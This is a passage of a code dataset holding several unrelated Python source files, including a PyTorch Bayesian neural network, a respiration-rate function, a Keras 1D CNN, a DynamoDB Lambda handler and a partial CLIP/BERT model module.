1)\n\n return - entropy - (log_likelihood + log_prior).mean()\n\n\n# Train & Test Utilities\n\ndef plot_update(ax, params, inputs, targets, N_samples, arch):\n\n # get data to plot\n plot_inputs = torch.Tensor(np.linspace(-8,8, num=400)).view(-1,1)\n \n mean, log_std = params\n bnn_func = BNN(arch, mean, log_std)\n \n outputs, _ = bnn_func.sample_bnn(plot_inputs, N_samples)\n \n # Numpy versions of data to plot\n inputs_numpy = inputs.detach().numpy()\n output_means = outputs.mean(0).detach().numpy()\n plot_inputs_numpy = plot_inputs.detach().numpy()\n\n # plot data\n plt.cla()\n ax.plot(inputs_numpy, targets.numpy(), 'k.')\n ax.plot(plot_inputs_numpy, output_means, color='r')\n ax.set_ylim([-5,5])\n plt.draw()\n plt.pause(1.0/60.0)\n\n# train & test functions\n\ndef train(model, n_data, batch_size, num_mc_weight_samples=10, n_iter=100):\n model.train()\n\n params = (model.mean, model.log_std)\n inputs, targets = sample_data(n_data)\n\n batch_size = 3\n\n fig = plt.figure(facecolor='white')\n ax = fig.add_subplot(111)\n plt.ion()\n plt.show(block=False)\n\n for i in range(0, n_data, batch_size):\n input_ = inputs[i:i+batch_size]\n target = targets[i:i+batch_size]\n \n #for ii in range(n_iter):\n # input_ = inputs\n # target = targets\n\n #optimizer.zero_grad()\n\n outputs, sample_weights = model.forward(input_, num_mc_weight_samples)\n train_loss = vlb_objective(params, target, outputs, sample_weights)\n\n print('parameters at iteration')\n print([p.sum().item() for p in model.parameters()])\n\n train_loss.backward()\n optimizer.step()\n\n print('train_loss', train_loss.item()) # why take -?\n print('mean', model.mean.mean().item())\n print('log_std', model.log_std.mean().item())\n\n plot_update(ax, params, inputs, targets, num_mc_weight_samples, arch)\n\ndef test(model, n_data=20, num_mc_weight_samples = 10):\n model.eval()\n\n with torch.no_grad():\n inputs, targets = sample_data(n_data)\n outputs, sampled_weights = model.forward(inputs, num_mc_weight_samples)\n\n test_loss = ((outputs.mean(0) - targets)**2).mean()\n\n print('test_loss', test_loss.item())\n\n\n\n# data loader functions\n\ndef build_toy_dataset(n_data=80, noise_std=0.1):\n #rs = npr.RandomState(0)\n inputs\t= np.concatenate([np.linspace(0, 3, num=n_data/2),\t \n np.linspace(6, 8, num=n_data/2)])\n targets = np.cos(inputs) + torch.randn(n_data) * noise_std\n inputs = 
(inputs - 4.0) / 2.0\n inputs\t= inputs[:, np.newaxis]\n targets = targets[:, np.newaxis] / 2.0\n return inputs, targets\n\ndef sample_data(n_data=20, noise_std=0.1, context_size=3):\n #rs = npr.RandomState(0)\n\n inputs\t= torch.Tensor(np.linspace(-1.2,1.2,n_data))\n targets = inputs**3 + torch.randn(n_data) * noise_std\n return inputs[:, None], targets[:, None]\n\n\n# main functions\n\nif __name__ == '__main__':\n torch.manual_seed(0)\n\n device = torch.device('cpu')\n\n arch = [1,20,20,1]\n\n # get the model instance\n model = BNN_wrapper(arch).to(device)\n optimizer = optim.Adam(model.parameters(), lr=0.01)\n\n n_data = 1000\n batch_size = 20\n train(model, n_data, batch_size)\n test(model)\n\n # Test\n \n #num_weights = get_num_weights_from_arch(arch)\n #mean = torch.zeros(num_weights)\n #log_std = torch.ones(num_weights)\n #bnn_func = BNN(arch, mean, log_std)\n\n inputs, targets = sample_data(20)\n N_samples = 2\n\n #bnn_func.sample_bnn(inputs, N_samples)\n\n #bnn = BNN_wrapper(arch)\n \n #params = (bnn.mean, bnn.log_std)\n #outputs, weights = bnn.forward(inputs, N_samples)\n\n #loss = vlb_objective(params, targets, outputs, weights)\n\n pdb.set_trace()\n","sub_path":"ml/weight_uncertainty_in_nns/bnn_daniel_pytorch_v2.py","file_name":"bnn_daniel_pytorch_v2.py","file_ext":"py","file_size_in_byte":7501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"409917917","text":"n=int(input())\narray=[[0 for i in range(n)] for j in range(n)]\nfor i in range(n):\n for j in range(n):\n array[i][j]=int(input())\nantiSimetrica=bool(True) \nfor i in range(n):\n for j in range(n):\n if(int(array[i][j]+array[j][i])!=0):\n antiSimetrica=False\n#Matriz antissimétrica:https://pt.wikipedia.org/wiki/Matriz_antissim%C3%A9trica \nif(simetrica):\n print(\"É antissimétrica!\")\nelse:\n print(\"Não é antissimétrica!\")","sub_path":"Programação/Lista_7/28.py","file_name":"28.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"322489537","text":"import unittest\n\nfrom paste_printer.command.command import Command\nfrom paste_printer.command.command_executor import Command_Executor\nfrom test_paste_printer.util.temp_file_handler import Temp_File_Handler\n\n\nclass TestCommandExecutor(unittest.TestCase):\n\n def setUp(self):\n self.test_file_handler = Temp_File_Handler()\n self.path_to_file = self.test_file_handler.test_gcode\n\n def tearDown(self):\n self.test_file_handler.delete_all_temp_files()\n\n def execute_command(self, command: Command):\n command_executor = Command_Executor(command)\n return command_executor.execute()\n\n def test_command_1(self):\n additional_information_bol = True\n pause_each_layer_bol = True\n retract_syringe_bol = True\n pause_each_layer_par_2 = True\n\n self.test_command_1 = Command(path_to_file=self.path_to_file,\n flow_rate_layer_0 = \"100\",\n flow_rate_par_1 = \"100\",\n flow_rate_differentiate_bol = True,\n bed_temperature=\"0\",\n print_speed=\"100\",\n fan_bol=True,\n additional_information_bol=additional_information_bol,\n pause_each_layer_bol=pause_each_layer_bol,\n clean_nozzle_bol=True,\n retract_syringe_bol=retract_syringe_bol,\n file_name=\"test\",\n storage_path=self.test_file_handler.temp_files,\n pause_each_layer_par_1=10,\n pause_each_layer_par_2=pause_each_layer_par_2,\n clean_nozzle_par_1=50)\n\n self.execute_command(self.test_command_1)\n\n def test_command_2(self):\n additional_information_bol = True\n 
pause_each_layer_bol = False\n retract_syringe_bol = True\n pause_each_layer_par_2 = True\n\n self.test_command_1 = Command(path_to_file=self.path_to_file,\n flow_rate_layer_0=\"100\",\n flow_rate_par_1=\"100\",\n flow_rate_differentiate_bol=True,\n bed_temperature=\"0\",\n print_speed=\"100\",\n fan_bol=True,\n additional_information_bol=additional_information_bol,\n pause_each_layer_bol=pause_each_layer_bol,\n clean_nozzle_bol=True,\n retract_syringe_bol=retract_syringe_bol,\n file_name=\"test\",\n storage_path=self.test_file_handler.temp_files,\n pause_each_layer_par_1=10,\n pause_each_layer_par_2=pause_each_layer_par_2,\n clean_nozzle_par_1=50)\n\n result_gcode = self.execute_command(self.test_command_1)\n\n","sub_path":"src/test_paste_printer/command/test_command_executor.py","file_name":"test_command_executor.py","file_ext":"py","file_size_in_byte":3310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"278462211","text":"import media\nimport fresh_tomatoes\nimport json\n\n\ndef get_movies():\n \"\"\" Parse Json \"movies.txt\" file to get the movies.\n Returns\n -------\n array\n Movies Collection\n \"\"\"\n movies = []\n json_movies = json.load(open('movies.txt'))\n for json_movie in json_movies:\n movies.append(media.Movie(\n json_movie['movie_title'],\n json_movie['movie_storyline'],\n json_movie['poster_image'],\n json_movie['trailer_youtube'])\n )\n return movies\n\n# Create .html file with the movies array.\nfresh_tomatoes.open_movies_page(get_movies())\n","sub_path":"entertainment_center.py","file_name":"entertainment_center.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"42127405","text":"# -*- coding: utf-8 -*-\nimport numpy as np\nimport pandas as pd\n\nfrom ..signal import signal_interpolate\nfrom ..signal import signal_smooth\n\ndef rsp_rate(peaks, troughs=None, sampling_rate=1000, desired_length=None, method=\"khodadad2018\"):\n \"\"\"Calculate respiration (RSP) rate.\n\n Calculate respiration rate and amplitude.\n\n Parameters\n ----------\n peaks : list, array, DataFrame, Series or dict\n The samples at which the inhalation peaks occur. If a dict or a\n DataFrame is passed, it is assumed that these containers were obtained\n with `rsp_findpeaks()`.\n troughs : list, array, or Series\n The samples at which the exhalation troughs occur. Can be passed in\n individually, or is automatically inferred if peaks is a dict or\n DataFrame obtained with `rsp_findpeaks()`.\n sampling_rate : int\n The sampling frequency of the signal that contains the peaks and\n troughs (in Hz, i.e., samples/second).\n desired_length : int\n By default, the returned respiration rate, period, and amplitude each\n have the same number of elements as peaks. If set to an integer, each\n of the returned elements will be interpolated between peaks over\n desired_length samples. Has not effect if a DataFrame is passed in as\n the peaks argument.\n method : str\n The processing pipeline to apply. 
Can be one of 'khodadad2018' or 'biosppy'.\n\n Returns\n -------\n signals : DataFrame\n A DataFrame containing respiration rate, and amplitude,\n accessible with the keys 'RSP_Rate' and 'RSP_Amplitude'\n respectively.\n\n See Also\n --------\n rsp_clean, rsp_findpeaks, rsp_process, rsp_plot\n\n Examples\n --------\n >>> import numpy as np\n >>> import pandas as pd\n >>> import neurokit2 as nk\n >>>\n >>> rsp = np.cos(np.linspace(start=0, stop=50, num=10000))\n >>> signals, info = nk.rsp_findpeaks(rsp)\n >>>\n >>> data = nk.rsp_rate(signals)\n >>> data[\"RSP_Signal\"] = rsp # Add the signal back\n >>> nk.standardize(data).plot()\n \"\"\"\n if isinstance(peaks, dict):\n troughs = peaks[\"RSP_Troughs\"]\n peaks = peaks[\"RSP_Peaks\"]\n elif isinstance(peaks, pd.DataFrame):\n desired_length = len(peaks[\"RSP_Peaks\"])\n troughs = np.where(peaks[\"RSP_Troughs\"] == 1)[0]\n peaks = np.where(peaks[\"RSP_Peaks\"] == 1)[0]\n\n # Find length of final signal to return\n if desired_length is None:\n desired_length = len(peaks)\n\n\n # Sanity checks\n if len(peaks) <= 3:\n print(\"NeuroKit warning: rsp_rate(): too little peaks detected to \"\n \"compute the rate. Returning empty variable(s).\")\n if troughs is not None:\n return pd.DataFrame({\"RSP_Rate\": np.full(desired_length, np.nan),\n \"RSP_Amplitude\": np.full(desired_length, np.nan)})\n else:\n return pd.DataFrame({\"RSP_Rate\": np.full(desired_length, np.nan)})\n\n # Calculate period in msec, based on horizontal peak to peak\n # difference and make sure that rate has the same number of elements as\n # peaks (important for interpolation later) by prepending the mean of\n # all periods\n period = np.ediff1d(peaks, to_begin=0) / sampling_rate\n period[0] = np.mean(period)\n\n # Get rate\n rate = 60 / period\n\n if method.lower() == \"biosppy\":\n rate, peaks, troughs = _rsp_rate_outliers(rate, peaks,\n troughs=troughs,\n threshold_absolute=35)\n\n # Smooth with moving average\n rate = signal_smooth(signal=rate, kernel='boxcar', size=3)\n\n # Interpolate all statistics to length of the breathing signal\n rate = signal_interpolate(rate,\n x_axis=peaks,\n desired_length=desired_length)\n\n # Prepare output\n out = {\"RSP_Rate\": rate}\n\n # Add amplitude if troughs are available\n if troughs is not None:\n # TODO: normalize amplitude?\n amplitude = peaks - troughs\n out[\"RSP_Amplitude\"] = signal_interpolate(amplitude,\n x_axis=peaks,\n desired_length=desired_length)\n\n signals = pd.DataFrame.from_dict(out)\n return(signals)\n\n\n\n\n\n# =============================================================================\n# Internals\n# =============================================================================\ndef _rsp_rate_outliers(rate, peaks, troughs=None, threshold_absolute=35):\n\n if threshold_absolute is None:\n return rate, peaks, troughs\n\n # physiological limits\n keep = np.nonzero(rate <= threshold_absolute)\n\n if troughs is not None:\n return rate[keep], peaks[keep], troughs[keep]\n else:\n return rate[keep], peaks[keep], None\n","sub_path":"neurokit2/rsp/rsp_rate.py","file_name":"rsp_rate.py","file_ext":"py","file_size_in_byte":4903,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"99851648","text":"import os.path\nimport numpy as np\nimport torch.utils.data as data\nimport scipy.io\nfrom utils import data_augmentation\nimport torch\n\ndef is_mat_file(filename):\n return any(filename.endswith(extension) for extension in [\".mat\"])\n\n\nclass loadingData(data.Dataset):\n \"\"\"\n 
Read Hyper-spectral images and RGB images pairs,\n The pair is ensured by 'sorted' function, so please check name convention.\n \"\"\"\n def __init__(self, image_dir, augment=None, total_num=int):\n super(loadingData, self).__init__()\n self.image_folders = os.listdir(image_dir)\n self.image_files = []\n for i in self.image_folders:\n if is_mat_file(i) and len(self.image_files) <= total_num:\n full_path = os.path.join(image_dir, i)\n self.image_files.append(full_path)\n self.augment = augment\n if self.augment:\n self.factor = 8\n else:\n self.factor = 1\n\n def __getitem__(self, index):\n file_index = index\n aug_num = 0\n if self.augment:\n file_index = index // self.factor\n aug_num = int(index % self.factor)\n load_dir = self.image_files[file_index]\n data = scipy.io.loadmat(load_dir)\n ms = np.array(data['ms'], dtype=np.float32)\n lms = np.array(data['ms_bicubic'], dtype=np.float32)\n gt = np.array(data['gt'], dtype=np.float32)\n ms, lms, gt = data_augmentation(ms, mode=aug_num), data_augmentation(lms, mode=aug_num), data_augmentation(gt, mode=aug_num)\n ms = torch.from_numpy(ms.copy()).permute(2, 0, 1)\n lms = torch.from_numpy(lms.copy()).permute(2, 0, 1)\n gt = torch.from_numpy(gt.copy()).permute(2, 0, 1)\n\n return ms, lms, gt\n\n def __len__(self):\n return len(self.image_files)*self.factor\n\n\n","sub_path":"data/load_data.py","file_name":"load_data.py","file_ext":"py","file_size_in_byte":1808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"263375129","text":"\n\n# # Leaflet cluster map of talk locations\n#\n# (c) 2016-2017 R. Stuart Geiger, released under the MIT license\n#\n# Run this from the _talks/ directory, which contains .md files of all your talks. \n# This scrapes the location YAML field from each .md file, geolocates it with\n# geopy/Nominatim, and uses the getorg library to output data, HTML,\n# and Javascript for a standalone cluster map.\n#\n# Requires: glob, getorg, geopy\n\nimport glob\nimport getorg\nfrom geopy import Nominatim\n\ng = glob.glob(\"*.md\")\n\n\ngeocoder = Nominatim()\nlocation_dict = {}\nlocation = \"\"\npermalink = \"\"\ntitle = \"\"\n\n\nfor file in g:\n with open(file, 'r') as f:\n lines = f.read()\n \n doublequote = False\n singlequote = False\n if lines.find('location: \"') > 1:\n doublequote = True\n elif lines.find('location: \\'') > 1:\n singlequote = True\n \n if doublequote == True:\n searchstring = 'location: \"'\n endstring = '\"'\n elif singlequote == True:\n searchstring = 'location: \\''\n endstring = '\\''\n \n if singlequote == True or doublequote == True:\n loc_start = lines.find(searchstring) + len(searchstring)\n lines_trim = lines[loc_start:]\n loc_end = lines_trim.find(endstring)\n location = lines_trim[:loc_end]\n \n if \" and \" in location:\n print(\"Multi-Searching for \" + location)\n for l in location.split(\" and \"):\n print(\"Searching for \" + l) \n location_dict[l] = geocoder.geocode(l)\n print(l, \"\\n\", location_dict[l]) \n else:\n print(\"Searching for \" + location) \n location_dict[location] = geocoder.geocode(location)\n print(location, \"\\n\", location_dict[location])\n\n\nm = getorg.orgmap.create_map_obj()\ngetorg.orgmap.output_html_cluster_map(location_dict, folder_name=\"../talkmap\", hashed_usernames=False)\n\n\n\n\n","sub_path":"talkmap.py","file_name":"talkmap.py","file_ext":"py","file_size_in_byte":2019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"348392834","text":"class Lab:\n def 
__init__(self, x, y):\n self.x = x\n self.y = y\n def info(self):\n print(\"X: = \",self.x)\n print(\"Y: = \",self.y)\n\n def mat(self):\n s = self.x*self.x+self.y*self.y\n print(\"RESULT: = \",s)\n\nx = float(input(\"write x\"))\ny = float(input(\"write y\"))\nexem = Lab(x,y)\nprint(exem.info())\nprint(exem.mat())","sub_path":"lab_6/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"332773940","text":"from Unit import *\nfrom keras.datasets import imdb\nfrom keras.models import Sequential\nfrom keras import layers\nfrom keras.preprocessing import sequence\nfrom keras.optimizers import RMSprop\nmax_feature = 10000\nmax_len = 500\nprint(\"Loading data......\")\n(x_train, y_train), (x_test, y_test) = imdb.load_data(num_words=max_feature)\n\nx_train = sequence.pad_sequences(x_train, maxlen=max_len)\nx_test = sequence.pad_sequences(x_test, maxlen=max_len)\n\n\nmodel = Sequential()\nmodel.add(layers.Embedding(max_feature, 128, input_length=max_len))\nmodel.add(layers.Conv1D(32, 7, activation='relu'))\nmodel.add(layers.MaxPooling1D(5))\nmodel.add(layers.Conv1D(32, 7, activation='relu'))\nmodel.add(layers.GlobalMaxPool1D())\nmodel.add(layers.Dense(1))\n\nmodel.summary()\n\nmodel.compile(optimizer=RMSprop(lr=1e-4),\n loss='binary_crossentropy',\n metrics=['acc']\n )\nhistory = model.fit(x_train, y_train, epochs=10, batch_size=128, validation_split=0.2)\nDraw(history)\n\n\n\n\n","sub_path":"one_dimCNN.py","file_name":"one_dimCNN.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"268369391","text":"from ttt.dynamodb import clients_table, rooms_table\nfrom ttt import utils, ws\n\n\ndef lambda_handler(event, context):\n connection_id = ws.get_connection_id(event)\n room_name = clients_table.get_room(connection_id)\n\n if room_name is not None:\n payload = ws.get_message_payload(event)\n step = payload['step']\n\n new_state = jump_to(room_name, step)\n if new_state is not None:\n new_state = utils.replace_decimals(new_state)\n for room_connection_id in rooms_table.get_connection_ids(room_name):\n ws.send_message(room_connection_id, 'state', new_state)\n return {\n 'statusCode': 200,\n 'body': 'Success',\n }\n\n\ndef jump_to(room_name, step):\n room = rooms_table.get(room_name)\n state = room[rooms_table.AttributeNames.STATE]\n version = room[rooms_table.AttributeNames.VERSION]\n\n history = state[rooms_table.StateAttributeNames.HISTORY]\n if step < 0 or step >= len(history):\n return None\n\n state[rooms_table.StateAttributeNames.STEP_NUMBER] = step\n state[rooms_table.StateAttributeNames.X_IS_NEXT] = (step % 2) == 0\n\n return state if rooms_table.update(room_name, state, version) else None\n","sub_path":"aws/src/ttt/functions/api/ws/jump_to.py","file_name":"jump_to.py","file_ext":"py","file_size_in_byte":1202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"90237103","text":"from typing import Any, Optional, Tuple\nimport math\n\nimport copy\nimport torch\nfrom torch import nn, Tensor, device\n\nfrom transformers.activations import ACT2FN\nfrom transformers.modeling_utils import (\n PreTrainedModel,\n apply_chunking_to_forward,\n)\nfrom transformers.configuration_utils import PretrainedConfig\nfrom transformers.modeling_outputs import BaseModelOutput, BaseModelOutputWithPooling\n\n# some function\ndef 
get_extended_attention_mask(attention_mask: Tensor, input_shape: Tuple[int], device: device) -> Tensor:\n \"\"\"\n Makes broadcastable attention and causal masks so that future and masked tokens are ignored.\n\n Arguments:\n attention_mask (:obj:`torch.Tensor`):\n Mask with ones indicating tokens to attend to, zeros for tokens to ignore.\n input_shape (:obj:`Tuple[int]`):\n The shape of the input to the model.\n device: (:obj:`torch.device`):\n The device of the input to the model.\n\n Returns:\n :obj:`torch.Tensor` The extended attention mask, with a the same dtype as :obj:`attention_mask.dtype`.\n \"\"\"\n # We can provide a self-attention mask of dimensions [batch_size, from_seq_length, to_seq_length]\n # ourselves in which case we just need to make it broadcastable to all heads.\n if attention_mask.dim() == 3:\n extended_attention_mask = attention_mask[:, None, :, :]\n elif attention_mask.dim() == 2:\n # Provided a padding mask of dimensions [batch_size, seq_length]\n # - if the model is a decoder, apply a causal mask in addition to the padding mask\n # - if the model is an encoder, make the mask broadcastable to [batch_size, num_heads, seq_length, seq_length]\n extended_attention_mask = attention_mask[:, None, None, :]\n else:\n raise ValueError(\n f\"Wrong shape for input_ids (shape {input_shape}) or attention_mask (shape {attention_mask.shape})\"\n )\n\n # Since attention_mask is 1.0 for positions we want to attend and 0.0 for\n # masked positions, this operation will create a tensor which is 0.0 for\n # positions we want to attend and -10000.0 for masked positions.\n # Since we are adding it to the raw scores before the softmax, this is\n # effectively the same as removing these entirely.\n extended_attention_mask = extended_attention_mask.to(dtype=torch.long) # fp16 compatibility\n extended_attention_mask = (1.0 - extended_attention_mask) * -10000.0\n return extended_attention_mask\n\n\ndef get_head_mask(\n head_mask: Optional[Tensor], num_hidden_layers: int, is_attention_chunked: bool = False\n ) -> Tensor:\n \"\"\"\n Prepare the head mask if needed.\n\n Args:\n head_mask (:obj:`torch.Tensor` with shape :obj:`[num_heads]` or :obj:`[num_hidden_layers x num_heads]`, `optional`):\n The mask indicating if we should keep the heads or not (1.0 for keep, 0.0 for discard).\n num_hidden_layers (:obj:`int`):\n The number of hidden layers in the model.\n is_attention_chunked: (:obj:`bool`, `optional`, defaults to :obj:`False`):\n Whether or not the attentions scores are computed by chunks or not.\n\n Returns:\n :obj:`torch.Tensor` with shape :obj:`[num_hidden_layers x batch x num_heads x seq_length x seq_length]` or\n list with :obj:`[None]` for each layer.\n \"\"\"\n head_mask = [None] * num_hidden_layers\n\n return head_mask\n\n\n# models\nclass IFAConfig(PretrainedConfig):\n \n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n\n\nclass IFAPreTrainedModel(PreTrainedModel):\n config_class = IFAConfig\n base_model_prefix = \"clip\"\n supports_gradient_checkpointing = True\n _keys_to_ignore_on_load_missing = [r\"position_ids\"]\n \n def __init_weights(self, module):\n pass\n\n\nclass CLIPVisionEmbeddings(nn.Module):\n def __init__(self, config):\n super().__init__()\n self.config = config\n self.embed_dim = config.hidden_size\n self.image_size = config.image_size\n self.patch_size = config.patch_size\n\n self.class_embedding = nn.Parameter(torch.randn(self.embed_dim))\n\n self.patch_embedding = nn.Conv2d(\n in_channels=3, out_channels=self.embed_dim, kernel_size=self.patch_size, 
stride=self.patch_size, bias=False\n )\n\n self.num_patches = (self.image_size // self.patch_size) ** 2\n self.num_positions = self.num_patches + 1\n self.position_embedding = nn.Embedding(self.num_positions, self.embed_dim)\n self.register_buffer(\"position_ids\", torch.arange(self.num_positions).expand((1, -1)))\n\n self.aux_position_embedding = nn.Embedding(48, self.embed_dim)\n self.register_buffer(\"aux_position_ids\", torch.arange(48).expand((1, -1)))\n\n self.rcnn_position_embedding = nn.Embedding(12, self.embed_dim)\n self.register_buffer(\"rcnn_position_ids\", torch.arange(12).expand((1, -1)))\n\n def forward(self, pixel_values, aux_embeddings=None, rcnn_embeddings=None):\n batch_size = pixel_values.shape[0]\n\n class_embeds = self.class_embedding.expand(batch_size, 1, -1)\n embeddings = class_embeds\n\n if aux_embeddings is not None:\n aux_embeds = []\n for aux_embedding in aux_embeddings:\n aux_embed = self.patch_embedding(aux_embedding)\n aux_embed = aux_embed.flatten(2).transpose(1, 2).flatten(0, 1) # 3*16, 768 3个子图\n aux_embeds.append(aux_embed)\n aux_embeds = torch.stack(aux_embeds) # bsz, 48, 768\n aux_embeds = aux_embeds + self.aux_position_embedding(self.aux_position_ids)\n embeddings = torch.cat((embeddings, aux_embeds), dim=1)\n\n if rcnn_embeddings is not None:\n rcnn_embeds = []\n for rcnn_embedding in rcnn_embeddings:\n rcnn_embed = self.patch_embedding(rcnn_embedding)\n rcnn_embed = rcnn_embed.flatten(2).transpose(1, 2).flatten(0, 1) # 3*4, 768 3个子图\n rcnn_embeds.append(rcnn_embed)\n rcnn_embeds = torch.stack(rcnn_embeds) # bsz, 12, 768\n rcnn_embeds = rcnn_embeds + self.rcnn_position_embedding(self.rcnn_position_ids)\n embeddings = torch.cat((embeddings, rcnn_embeds), dim=1)\n return embeddings\n\n\nclass BertEmbeddings(nn.Module):\n \"\"\"Construct the embeddings from word, position and token_type embeddings.\"\"\"\n\n def __init__(self, config):\n super().__init__()\n self.word_embeddings = nn.Embedding(config.vocab_size, config.hidden_size, padding_idx=config.pad_token_id)\n self.position_embeddings = nn.Embedding(config.max_position_embeddings, config.hidden_size)\n self.token_type_embeddings = nn.Embedding(config.type_vocab_size, config.hidden_size)\n\n # self.LayerNorm is not snake-cased to stick with TensorFlow model variable name and be able to load\n # any TensorFlow checkpoint file\n self.LayerNorm = nn.LayerNorm(config.hidden_size, eps=config.layer_norm_eps)\n self.dropout = nn.Dropout(config.hidden_dropout_prob)\n # position_ids (1, len position emb) is contiguous in memory and exported when serialized\n self.position_embedding_type = getattr(config, \"position_embedding_type\", \"absolute\")\n self.register_buffer(\"position_ids\", torch.arange(config.max_position_embeddings).expand((1, -1)))\n\n def forward(\n self, input_ids=None, token_type_ids=None, position_ids=None, inputs_embeds=None, past_key_values_length=0\n ):\n if input_ids is not None:\n input_shape = input_ids.size()\n else:\n input_shape = inputs_embeds.size()[:-1]\n\n seq_length = input_shape[1]\n\n if position_ids is None:\n position_ids = self.position_ids[:, past_key_values_length : seq_length + past_key_values_length]\n\n # Setting the token_type_ids to the registered buffer in constructor where it is all zeros, which usually occurs\n # when its auto-generated, registered buffer helps users when tracing the model without passing token_type_ids, solves\n # issue #5664\n if token_type_ids is None:\n if hasattr(self, \"token_type_ids\"):\n buffered_token_type_ids = 
self.token_type_ids[:, :seq_length]\n buffered_token_type_ids_expanded = buffered_token_type_ids.expand(input_shape[0], seq_length)\n token_type_ids = buffered_token_type_ids_expanded\n else:\n token_type_ids = torch.zeros(input_shape, dtype=torch.long, device=self.position_ids.device)\n\n if inputs_embeds is None:\n inputs_embeds = self.word_embeddings(input_ids)\n token_type_embeddings = self.token_type_embeddings(token_type_ids)\n\n embeddings = inputs_embeds + token_type_embeddings\n if self.position_embedding_type == \"absolute\":\n position_embeddings = self.position_embeddings(position_ids)\n embeddings += position_embeddings\n embeddings = self.LayerNorm(embeddings)\n embeddings = self.dropout(embeddings)\n return embeddings\n\n\nclass CLIPAttention(nn.Module):\n \"\"\"Multi-headed attention from 'Attention Is All You Need' paper\"\"\"\n\n def __init__(self, config):\n super().__init__()\n self.config = config\n self.embed_dim = config.hidden_size\n self.num_heads = config.num_attention_heads\n self.head_dim = self.embed_dim // self.num_heads\n assert (\n self.head_dim * self.num_heads == self.embed_dim\n ), f\"embed_dim must be divisible by num_heads (got `embed_dim`: {self.embed_dim} and `num_heads`: {self.num_heads}).\"\n self.scale = self.head_dim ** -0.5\n self.dropout = config.attention_dropout\n\n self.k_proj = nn.Linear(self.embed_dim, self.embed_dim)\n self.v_proj = nn.Linear(self.embed_dim, self.embed_dim)\n self.q_proj = nn.Linear(self.embed_dim, self.embed_dim)\n self.out_proj = nn.Linear(self.embed_dim, self.embed_dim)\n\n def _shape(self, tensor: torch.Tensor, seq_len: int, bsz: int):\n return tensor.view(bsz, seq_len, self.num_heads, self.head_dim).transpose(1, 2).contiguous()\n\n def forward(\n self,\n hidden_states: torch.Tensor,\n output_attentions: bool = False,\n past_key_values: torch.Tensor = None,\n current_layer: int = None,\n output_qks=None,\n ) -> Tuple[torch.Tensor, Optional[torch.Tensor], Optional[Tuple[torch.Tensor]]]:\n \"\"\"Input shape: Batch x Time x Channel\"\"\"\n\n bsz, tgt_len, embed_dim = hidden_states.size()\n\n # get query proj\n query_states = self.q_proj(hidden_states) * self.scale\n key_states = self._shape(self.k_proj(hidden_states), -1, bsz)\n value_states = self._shape(self.v_proj(hidden_states), -1, bsz)\n qks = (key_states, value_states) if output_qks else None\n\n\n if past_key_values is not None:\n key_states = torch.cat([past_key_values[0], key_states], dim=2)\n value_states = torch.cat([past_key_values[1], value_states], dim=2)\n\n proj_shape = (bsz * self.num_heads, -1, self.head_dim)\n query_states = self._shape(query_states, tgt_len, bsz)\n\n query_states = query_states.view(*proj_shape)\n key_states = key_states.view(*proj_shape)\n value_states = value_states.view(*proj_shape)\n \n src_len = key_states.size(1)\n attn_weights = torch.bmm(query_states, key_states.transpose(1, 2))\n\n if attn_weights.size() != (bsz * self.num_heads, tgt_len, src_len):\n raise ValueError(\n f\"Attention weights should be of size {(bsz * self.num_heads, tgt_len, src_len)}, but is {attn_weights.size()}\"\n ) \n attn_weights = nn.functional.softmax(attn_weights, dim=-1)\n\n if output_attentions:\n # this operation is a bit akward, but it's required to\n # make sure that attn_weights keeps its gradient.\n # In order to do so, attn_weights have to reshaped\n # twice and have to be reused in the following\n attn_weights_reshaped = attn_weights.view(bsz, self.num_heads, tgt_len, src_len)\n attn_weights = attn_weights_reshaped.view(bsz * self.num_heads, 
tgt_len, src_len)\n else:\n attn_weights_reshaped = None\n\n attn_probs = nn.functional.dropout(attn_weights, p=self.dropout, training=self.training)\n\n attn_output = torch.bmm(attn_probs, value_states)\n\n if attn_output.size() != (bsz * self.num_heads, tgt_len, self.head_dim):\n raise ValueError(\n f\"`attn_output` should be of size {(bsz, self.num_heads, tgt_len, self.head_dim)}, but is {attn_output.size()}\"\n )\n\n attn_output = attn_output.view(bsz, self.num_heads, tgt_len, self.head_dim)\n attn_output = attn_output.transpose(1, 2)\n attn_output = attn_output.reshape(bsz, tgt_len, embed_dim)\n\n attn_output = self.out_proj(attn_output)\n\n return attn_output, attn_weights_reshaped, qks\n\ndef quick_gelu(x):\n return x * torch.sigmoid(1.702 * x)\n\nclass CLIPMLP(nn.Module):\n def __init__(self, config):\n super().__init__()\n self.config = config\n self.activation_fn = quick_gelu\n self.fc1 = nn.Linear(config.hidden_size, config.intermediate_size)\n self.fc2 = nn.Linear(config.intermediate_size, config.hidden_size)\n\n def forward(self, hidden_states):\n hidden_states = self.fc1(hidden_states)\n hidden_states = self.activation_fn(hidden_states)\n hidden_states = self.fc2(hidden_states)\n return hidden_states\n\n\nclass BertSelfAttention(nn.Module):\n def __init__(self, config):\n super().__init__()\n self.num_attention_heads = config.num_attention_heads # 12\n self.attention_head_size = int(config.hidden_size / config.num_attention_heads) # 64\n self.all_head_size = self.num_attention_heads * self.attention_head_size # 768\n\n self.query = nn.Linear(config.hidden_size, self.all_head_size)\n self.key = nn.Linear(config.hidden_size, self.all_head_size)\n self.value = nn.Linear(config.hidden_size, self.all_head_size)\n\n self.dropout = nn.Dropout(config.attention_probs_dropout_prob)\n\n def transpose_for_scores(self, 